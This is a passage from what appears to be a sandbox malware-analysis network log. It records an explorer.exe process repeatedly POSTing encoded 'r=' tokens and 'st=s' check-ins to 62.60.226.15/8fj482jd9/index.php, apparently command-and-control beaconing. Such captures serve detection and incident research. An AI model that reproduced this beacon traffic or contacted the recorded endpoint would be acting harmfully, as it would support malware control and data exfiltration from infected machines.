                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                15 | 192.168.2.10 | 49738 | 62.60.226.15 | 80 | 2972 | C:\Windows\SysWOW64\explorer.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 16, 2024 15:27:29.146754980 CET | 305 | OUT | POST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 152
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
                                                Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
                                                Dec 16, 2024 15:27:30.416800022 CET | 196 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:27:30 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                16 | 192.168.2.10 | 49739 | 62.60.226.15 | 80 | 2972 | C:\Windows\SysWOW64\explorer.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 16, 2024 15:27:32.156647921 CET | 155 | OUT | POST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Dec 16, 2024 15:27:33.426440001 CET | 219 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:27:33 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                17 | 192.168.2.10 | 49740 | 62.60.226.15 | 80 | 2972 | C:\Windows\SysWOW64\explorer.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 16, 2024 15:27:35.061167955 CET | 305 | OUT | POST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 152
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
                                                Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
                                                Dec 16, 2024 15:27:36.331129074 CET | 196 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:27:36 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                18 | 192.168.2.10 | 49741 | 62.60.226.15 | 80 | 2972 | C:\Windows\SysWOW64\explorer.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 16, 2024 15:27:38.076776028 CET | 155 | OUT | POST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Dec 16, 2024 15:27:39.343921900 CET | 219 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:27:39 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                19 | 192.168.2.10 | 49742 | 62.60.226.15 | 80 | 2972 | C:\Windows\SysWOW64\explorer.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 16, 2024 15:27:40.972737074 CET | 305 | OUT | POST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 152
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
                                                Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                20 | 192.168.2.10 | 49744 | 62.60.226.15 | 80 | 2972 | C:\Windows\SysWOW64\explorer.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 16, 2024 15:27:46.720798969 CET | 155 | OUT | POST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Dec 16, 2024 15:27:47.992178917 CET | 219 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:27:47 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                21 | 192.168.2.10 | 49745 | 62.60.226.15 | 80 | 2972 | C:\Windows\SysWOW64\explorer.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 16, 2024 15:27:49.626089096 CET | 305 | OUT | POST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 152
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
                                                Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
                                                Dec 16, 2024 15:27:50.896311998 CET | 196 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:27:50 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                22 | 192.168.2.10 | 49746 | 62.60.226.15 | 80 | 2972 | C:\Windows\SysWOW64\explorer.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 16, 2024 15:27:52.641288042 CET | 155 | OUT | POST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Dec 16, 2024 15:27:53.914063931 CET | 219 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:27:53 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                23 | 192.168.2.10 | 49747 | 62.60.226.15 | 80 | 2972 | C:\Windows\SysWOW64\explorer.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 16, 2024 15:27:55.547861099 CET | 305 | OUT | POST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 152
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
                                                Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
                                                Dec 16, 2024 15:27:56.847098112 CET | 196 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:27:56 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                24 | 192.168.2.10 | 49748 | 62.60.226.15 | 80 | 2972 | C:\Windows\SysWOW64\explorer.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 16, 2024 15:27:58.594050884 CET | 155 | OUT | POST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Dec 16, 2024 15:27:59.914592981 CET | 219 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:27:59 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                25 | 192.168.2.10 | 49749 | 62.60.226.15 | 80 | 2972 | C:\Windows\SysWOW64\explorer.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 16, 2024 15:28:01.628324986 CET | 305 | OUT | POST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 152
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
                                                Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
                                                Dec 16, 2024 15:28:02.874509096 CET | 196 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:28:02 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                26 | 192.168.2.10 | 49750 | 62.60.226.15 | 80 | 2972 | C:\Windows\SysWOW64\explorer.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 16, 2024 15:28:04.655003071 CET | 155 | OUT | POST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Dec 16, 2024 15:28:05.949956894 CET | 219 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:28:05 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                27 | 192.168.2.10 | 49751 | 62.60.226.15 | 80 | 2972 | C:\Windows\SysWOW64\explorer.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 16, 2024 15:28:07.578259945 CET | 305 | OUT | POST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 152
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
                                                Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
                                                Dec 16, 2024 15:28:08.862075090 CET | 196 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:28:08 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                28 | 192.168.2.10 | 49752 | 62.60.226.15 | 80 | 2972 | C:\Windows\SysWOW64\explorer.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 16, 2024 15:28:10.610791922 CET | 155 | OUT | POST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Dec 16, 2024 15:28:11.888140917 CET | 219 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:28:11 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                29 | 192.168.2.10 | 49753 | 62.60.226.15 | 80 | 2972 | C:\Windows\SysWOW64\explorer.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 16, 2024 15:28:13.517308950 CET | 305 | OUT | POST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 152
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
                                                Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
                                                Dec 16, 2024 15:28:14.913259983 CET | 196 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:28:14 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                30 | 192.168.2.10 | 49754 | 62.60.226.15 | 80 | 2972 | C:\Windows\SysWOW64\explorer.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 16, 2024 15:28:16.657264948 CET | 155 | OUT | POST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Dec 16, 2024 15:28:17.950202942 CET | 219 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:28:17 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                31 | 192.168.2.10 | 49755 | 62.60.226.15 | 80 | 2972 | C:\Windows\SysWOW64\explorer.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 16, 2024 15:28:19.585283995 CET | 305 | OUT | POST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 152
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
                                                Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
                                                Dec 16, 2024 15:28:20.870526075 CET | 196 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:28:20 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                32 | 192.168.2.10 | 49756 | 62.60.226.15 | 80 | 2972 | C:\Windows\SysWOW64\explorer.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 16, 2024 15:28:22.611706972 CET | 155 | OUT | POST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Dec 16, 2024 15:28:23.925257921 CET | 219 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:28:23 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                33 | 192.168.2.10 | 49757 | 62.60.226.15 | 80 | 2972 | C:\Windows\SysWOW64\explorer.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 16, 2024 15:28:25.563541889 CET | 305 | OUT | POST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 152
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
                                                Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
                                                Dec 16, 2024 15:28:26.839324951 CET | 196 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:28:26 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                34 | 192.168.2.10 | 49758 | 62.60.226.15 | 80 | 2972 | C:\Windows\SysWOW64\explorer.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 16, 2024 15:28:28.598573923 CET | 155 | OUT | POST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Dec 16, 2024 15:28:29.870234966 CET | 219 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:28:29 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                35 | 192.168.2.10 | 49759 | 62.60.226.15 | 80 | 2972 | C:\Windows\SysWOW64\explorer.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 16, 2024 15:28:31.501028061 CET | 305 | OUT | POST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 152
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
                                                Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
                                                Dec 16, 2024 15:28:32.799202919 CET | 196 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:28:32 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                36 | 192.168.2.10 | 49760 | 62.60.226.15 | 80 | 2972 | C:\Windows\SysWOW64\explorer.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 16, 2024 15:28:34.547209024 CET | 155 | OUT | POST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Dec 16, 2024 15:28:35.816580057 CET | 219 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
